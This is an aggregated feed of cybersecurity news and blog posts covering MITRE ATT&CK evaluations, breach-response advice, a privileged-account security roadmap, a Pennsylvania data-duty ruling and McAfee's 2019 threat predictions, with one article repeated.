Can you deceive a deceiver? That’s the question that computer scientists at Binghamton University, State University of New York have recently been exploring. Assistant Professor of Computer Science Guanhua Yan and PhD student Zhan Shu are looking at how to make cyber deception a more effective tool against malicious hackers. Their study was inspired by the 2013 Target data breach that affected 41 million consumers and cost Target $18.5 million, and the 2017 Equifax hack … More

The post Making it harder for attackers to know when a system begins to deceive a bad actor appeared first on Help Net Security.

Best practice methodology for industrial network security: SEC-OT

Secure Operations Technology (SEC-OT) is a methodology and collection of best practices inspired by a decade of experience working with secure industrial sites. The SEC-OT approach is counter-intuitive to many IT and even industrial control system (ICS) security practitioners. It turns out that secure industrial sites ask different questions and get different answers. For example, industrial sites generally do not ask “how can we protect our information?” Instead, they ask, “how to we keep the … More

The post Best practice methodology for industrial network security: SEC-OT appeared first on Help Net Security.

IIoT technologies integration creates expansion opportunities in the industrial cybersecurity industry

High penetration of Industrial Internet of Things (IIoT) technology in critical infrastructure and the manufacturing sector has resulted in a growing number of potential cyber-attack surfaces. According to a recent analysis from Frost & Sullivan, cyber-attacks within the energy and utilities industries alone cost an average of $13.2 million per year. These rising incidences of cyber-attacks, coupled with evolving compliance regulations by governments, and increased awareness among mature and less mature markets have accelerated the … More

The post IIoT technologies integration creates expansion opportunities in the industrial cybersecurity industry appeared first on Help Net Security.

What Type of Vulnerabilities Does a Penetration Test Look For?

Penetration testing is becoming increasingly popular as organizations are beginning to embrace the need for stronger cybersecurity. But there are still too many businesses that don’t fully understand the benefits of regular security testing. Pen testing is vital for any kind of organization with an IT system or website. A recent survey of penetration testers […]… Read More

The post What Type of Vulnerabilities Does a Penetration Test Look For? appeared first on The State of Security.

First Smartphone: Are You Putting Cyberbullies Under the Tree This Year?

first smartphone

There’s pressure — lots of pressure. And not the typical I-want-a-bike or a doll-that-poops kind of pressure your kids may have foisted upon you just a few Christmases ago. No, this is the big leagues. Your child wants his or her first smartphone to show up under the tree this year. Is your son or daughter ready? Bigger question: Are you ready?

A first smartphone is a big step in a family that can’t be unstepped. Because it’s not about what a phone used to be about, which is dialing the number of a person you need to speak with. Today, giving your child a cell phone unlocks a hidden wardrobe door that leads to a whole new Narnia-like world abounding in both hills of goodness and valleys of emotional punches.

A first cell phone isn’t a casual purchase. Besides the financial investment (these things aren’t cheap), there’s a family dynamic that will likely change and a peer-to-peer dynamic that will go through its tumultuous metamorphosis.

Here are a few things to consider and talk through with your family before making your final decision to purchase that first smartphone.

Family talking points

first smartphone

  1. Maturity milestones. A phone is a small computer your child will carry in his or her pocket from this point forward. Has your child demonstrated maturity in other areas? Can he or she stay home alone responsibly for short periods? Does your child take care of his or her possessions, complete chores, and homework on time and without you nagging? Does your child earn/save/spend his or her allowance in a mature way? Does your child show empathy for others or deal with conflict well? These milestones are worth examining. If you feel uneasy about your child’s overall maturity, you might consider setting some goals to move your child toward cell phone ownership sometime in the future.
  2. The cyberbully factor. We know you’d never willingly invite a cyberbully into your home and especially wouldn’t put one under the tree for your child to discover on Christmas morning. However, that’s the reality of what phone ownership will bring sooner or later. Is your child emotionally strong enough to handle mean comments, feeling excluded, or being criticized or joked with in public? How does your child handle peer conflict without a phone? The emotional impact of owning a phone is not something you will see advertised, but it’s a huge factor to consider.
  3. Peer pressure. Digital peer pressure is a real thing. There’s pressure to dress a certain way, post pictures a certain way, and post activities online to gain status points in certain social circles. The selfie craze, online dares, digital trends and hashtags, and other pressures are all part of the smartphone equation.
  4. Harmful content. There’s a lot of great content online — educational, entertaining, and fun — but there’s a lot of content that is harmful to kids such as pornography, hateful ideology, and cruelty. Can your child resist the temptation to seek out or look at concerning content? Can your child discern ideas? Are you as a parent willing to take the extra steps to filter inappropriate content?
  5. Privacy issues. With a new phone comes great responsibility toward guarding first smartphoneone’s personal information. Do you have the time to communicate, teach, and monitor your child’s online footprint? Getting kids off to a strong start will require much time and care up front until your son or daughter has a grasp on the value of personal data.
  6. Social media. Social media owns vast real estate on a child’s phone and includes everything from gaming, to social networks, to various “communities” attached to apps. Anywhere your child can create a username and profile and connect with others, opens him or her up to risks of cyberbullying, strangers, and scams. Discuss new apps and establish ground rules and phone usage boundaries that make sense for your family. The most important part of setting rules is to enforce the rules.
  7. Screentime ground rules. With a first smartphone comes the risk of too much screen time. Addiction to online gaming, social media, and phones, in general, have become a public health concern. Put family rules in place that set time limits and phone free zones. Keep communication open and consistent to keep your kids following healthy screen time habits.

 

 

The post First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? appeared first on McAfee Blogs.

Security Affairs: MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation’s ATT&CK framework has been used to evaluate the efficiency of several enterprise security products designed by several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products based on their ability in detecting advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principle cybersecurity engineer at MITRE.

Duff explained MITRE adopt a transparent methodology and knowledge base that will make easy to interpret results obtained with its service.

ATT&CK framework

In the first phase, MITRE offered the possibility to evaluate the service and its efficiency on a case study on APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group, it operates under the control of the China’s Ministry of State Security. The cyber espionage group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.  As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. 

The first tests of the ATT&CK framework conducted by Mitre evaluatedthe ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the APT3 cyberespionage group.

The tests are focused on the product’s capabilities of detecting malicious activities typically carried out by the threat actors once they have compromised the system of an organization. It is important to highlight that the MITRE ATT&CK framework does not assign scores to each product, it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with vendors during the evaluations and sharing with them the results.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the above vendors that signed up before the June 30, 2018 cohort deadline

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.



Security Affairs

MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation’s ATT&CK framework has been used to evaluate the efficiency of several enterprise security products designed by several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products based on their ability in detecting advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principle cybersecurity engineer at MITRE.

Duff explained MITRE adopt a transparent methodology and knowledge base that will make easy to interpret results obtained with its service.

ATT&CK framework

In the first phase, MITRE offered the possibility to evaluate the service and its efficiency on a case study on APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group, it operates under the control of the China’s Ministry of State Security. The cyber espionage group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.  As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. 

The first tests of the ATT&CK framework conducted by Mitre evaluatedthe ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the APT3 cyberespionage group.

The tests are focused on the product’s capabilities of detecting malicious activities typically carried out by the threat actors once they have compromised the system of an organization. It is important to highlight that the MITRE ATT&CK framework does not assign scores to each product, it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with vendors during the evaluations and sharing with them the results.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the above vendors that signed up before the June 30, 2018 cohort deadline

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.

Affected by a Data Breach? 6 Security Steps You Should Take

It’s common for people to share their personal information with companies for multiple reasons. Whether you’re checking into a hotel room, using a credit card to make a purchase at your favorite store, or collecting rewards points at your local coffee shop, companies have more access to your data than you may think. While this can help you build relationships with your favorite vendors, what happens if their security is compromised?

A high-profile hotel and another popular consumer brand’s perks program recently experienced data breaches that exposed users’ personal information. If you think you were affected by one of these breaches, there are multiple steps you can take to help protect yourself from the potential side effects.

Check out the following tips if you think you may have been affected by a data breach, or just want to take extra precautions:

  • Change your password. Most people will rotate between the same three passwords for all of their personal accounts. While this makes it easier to remember your credentials, it also makes it easier for hackers to access more than one of your accounts. Try using a unique password for every one of your accounts or employ a password manager.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Update your privacy settings. Be careful with how much of your personal information you share online. Make sure your social media accounts and mobile apps are on private and use multi-factor authentication to prevent your accounts from being hacked.
  • Be vigilant about checking your accounts. If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Affected by a Data Breach? 6 Security Steps You Should Take appeared first on McAfee Blogs.

Industry reactions to the enormous Marriott data breach

On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database in the United States. Marriott engaged security experts to help determine what occurred. Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. The company recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, … More

The post Industry reactions to the enormous Marriott data breach appeared first on Help Net Security.

The fundamentals of network security and cybersecurity hygiene

Infrastructure and network security The two fundamental building blocks to ensuring that your data is secure are physical infrastructure and network security. Understanding and protecting your information from threats and human error require meticulously layered security protocols. Physical infrastructure Last year, British Airways canceled over 400 flights and stranded 75,000 passengers because of an IT outage caused by an engineer who disconnected a power supply at a data center near London’s Heathrow airport. When it … More

The post The fundamentals of network security and cybersecurity hygiene appeared first on Help Net Security.

Secure your privileged administrative accounts with a phased roadmap

In my role, I often meet with CISOs and security architects who are updating their security strategy to meet the challenges of continuously evolving attacker techniques and cloud platforms. A frequent topic is prioritizing security for their highest value assets, both the assets that have the most business value today as well as the initiatives that the organization is banking on for the future. This typically includes intellectual property, customer data, key new digital initiatives, and other data that, if leaked, would do the greatest reputational and financial damage. Once weve identified the highest value assets, it inevitably leads to a conversation about all the privileged accounts that have administrative rights over these assets. Most of our customers recognize that you can no longer protect the enterprise just by securing the network edge; the cloud and mobile devices have permanently changed that. Identities represent the critically important new security perimeter in a dual perimeter strategy while legacy architectures are slowly phased out.

Regardless of perimeter and architecture, there are few things more important to a secure posture than protecting admins. This is because a compromised admin account would cause a much greater impact on the organization than a compromised non-privileged user account.

If you are working on initiatives to secure your privileged accounts (and I hope you are ), this post is designed to help. Ive shared some of the principles and tools that Microsoft has used to guide and enhance our own security posture, including some prescriptive roadmaps to help you plan your own initiatives.

Protect the privileged access lifecycle

Once you start cataloging all the high-value assets and who can impact them, it quickly becomes clear that we arent just talking about traditional IT admins when we talk about privileged accounts. There are people who manage social media accounts rich with customer data, cloud services admins, and those that manage directories or financial data. All of these user accounts need to be secured (though most organizations start with IT admins first and then progress to others, prioritized based on risk or the ability to secure the account quickly).

Protecting the privileged access lifecycle is also more than just vaulting the credentials. Organizations need to take a complete and thoughtful approach to isolate the organizations systems from risks. It requires changes to:

  • Processes, habits, administrative practices, and knowledge management.
  • Technical components such as host defenses, account protections, and identity management.

Principles of securing privileged access

Securing all aspects of the privileged lifecycle really comes down to the following principles:

  • Strengthen authentication:
    • Move beyond relying solely on passwords that are too often weak, or easily guessed and move to a password-less, Multi-Factor Authentication (MFA) solution that uses at least two forms of authentication, such as a PIN, biometrics, and/or a code generated by a device.
    • Make sure you detect and remediate leaked credentials.
  • Reduce the attack surface:
    • Remove legacy/insecure protocols.
    • Remove duplicate/weak passwords.
    • Reduce dependencies.
  • Increase monitoring and detection.
  • Automate threat response.
  • Ensure usability for administrators.

To illustrate the importance we place on privileged access controls, Ive included a diagram that shows how Microsoft protects itself. Youll see we have instituted traditional defenses for securing the network, as well as made extensive investments into development security, continuous monitoring, and processes to ensure we are looking at our systems with an attackers eye. You can also see how we place a very high priority on security for privileged users, with extensive training, rigorous processes, separate workstations, as well as strong authentication.

Prioritize quick, high-value changes first using our roadmap

To help our customers get the most protection for their investment of time/resources, we have created prescriptive roadmaps to kickstart your planning. These will help you plan out your initiatives in phases, so you can knock out quick wins first and then incrementally increase your security over time.

Check out the Azure Active Directory (Azure AD) roadmap to plan out protections for the administration of this critical system. We also have an on-premises roadmap focused on Active Directory admins, which Ive included below. Since many organizations run hybrid networks, we will soon merge these two roadmaps.

On-premises privileged identity roadmap

There are three stages to secure privileged access for an on-premises AD.

Stage 1 (30 days)

Stage 1 of the roadmap is focused on quickly mitigating the most frequently used attack techniques of credential theft and abuse.

1. Separate accounts: This is the first step to mitigate the risk of an internet attack (phishing attacks, web browsing) from impacting administrative privileges.

2 and 3. Unique passwords for workstations and servers: This is a critical containment step to protect against adversaries stealing and re-using password hashes for local admin accounts to gain access to other computers.

4. Privileged access workstations (PAW) stage 1: This reduces internet risks by ensuring that the workstations admins use every day are protected at a very high level.

5. Identity attack detection: Ensures that security operations have visibility into well-known attack techniques on admins.

Stage 2 (90 days)

These capabilities build on the mitigations from the 30-day plan and provide a broader spectrum of mitigations, including increased visibility and control of administrative rights.

1. Require Windows Hello for business: Replace hard-to-remember and easy-to-hack passwords with strong, easy-to-use authentication for your admins.

2. PAW stage 2: Requiring separate admin workstations significantly increases the security of the accounts your admins use to do their work. This makes it extremely difficult for adversaries to get access to your admins and is modeled on the systems we use to protect Azure and other sensitive systems at Microsoft (described earlier).

3. Just in time privileges: Lowers the exposure of privileges and increases visibility into privilege use by providing them to admins as they need it. This same principle is applied rigorously to admins of our cloud.

4. Enable credential guard on Windows 10 workstations: This isolates secrets for legacy authentication protocols like Kerberos and NTLM on all Windows 10 user workstations to make it more difficult for attackers to operate there and reach the admins.

5. Leaked credentials 1: This enables you to detect a risk of a leaked password by synchronizing password hashes to Azure AD where it can compare them to known leaked credentials.

6. Lateral movement vulnerability detection: Discover which sensitive accounts in your network are exposed because of their connection to non-sensitive accounts, groups, and machines.

Stage 3: Proactively secure posture

These capabilities build on the mitigations from previous phases and move your defenses into a proactive posture. While there will never be perfect security, this represents the strongest protections against privilege attacks currently known and available today.

1. Review role-based access control: Protect identity and management systems using a set of buffer zones between full control of the environment (Tier 0) and the high-risk workstation assets that attackers frequently compromise.

2. PAW stage 3: Expands your protection by separating internet risks (phishing attacks, web browsing) from all administrative privileges, not just AD admins.

3. Lowers the attack surface of domain and domain controller: This hardens these sensitive assets to make it difficult for attackers to compromise them with classic attacks like unpatched vulnerabilities and exploiting configuration weaknesses.

4. Leaked credentials 2: This steps up the protection of admin accounts against leaked credentials by forcing a reset of passwords using conditional access and self-service password reset (versus requiring someone to review the leaked credentials reports and manually take action).

Securing your administrative accounts will reduce your risk significantly. Stay tuned for the hybrid roadmap, which will be completed in early 2019.

The post Secure your privileged administrative accounts with a phased roadmap appeared first on Microsoft Secure.

Supreme Court of Pennsylvania Ruling on Common Law Duty to Protect Electronic Employee Data

On November 21, 2018, the Supreme Court of Pennsylvania ruled that a putative class action filed against UPMC (d/b/a The University of Pittsburg Medical Center) should not have been dismissed.

The case arose from a data breach in which criminals accessed UPMC’s computer systems and stole the personal and financial information of 62,000 current and former UPMC employees. This information included names, birth dates, Social Security numbers, addresses, tax forms and bank account data, all of which the employees were required to provide as a condition of employment. The plaintiffs alleged that UPMC was negligent in the collection and storage of this information, and breached an implied contract in connection with the event. The trial court dismissed the case, which the intermediate appellate court affirmed.

Pennsylvania’s highest court, however, disagreed. The court held that: (1) an employer has a duty under Pennsylvania common law to use reasonable care to safeguard its employees’ sensitive personal information that it stores on Internet-accessible computer systems; and (2) Pennsylvania’s economic loss doctrine did not bar the plaintiffs’ negligence claim.

The court explained that it was not creating a new, affirmative duty. Rather, “the case is one involving application of an existing duty to a novel factual scenario.” In other words, the duty was presumed due to UPMC’s alleged risk-causing conduct. Indeed, the court stressed that due to the early procedural posture of the case, it was required to accept as true the plaintiffs’ allegations that UPMC’s conduct created the risk of the data breach. The presence of a third party’s criminal conduct also was not a superseding cause that cut off UPMC’s liability because UPMC’s alleged conduct created a situation where UPMC knew, or should have known, that a third party might try to compromise its network.

The court next found that the economic loss doctrine, as applied in Pennsylvania, did not preclude all negligence claims seeking purely “economic damages” (i.e., monetary damages that do not involve personal injury or property damage). After discussing prior Pennsylvania economic loss doctrine cases, the court concluded that the common law duty it had recognized existed independently from any contractual obligation between the parties, thus precluding application of the economic loss doctrine. As the court noted, this approach to the economic loss doctrine is not taken by all states.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

 

Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the RigExploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. One example is WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDOS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaced, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service— especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

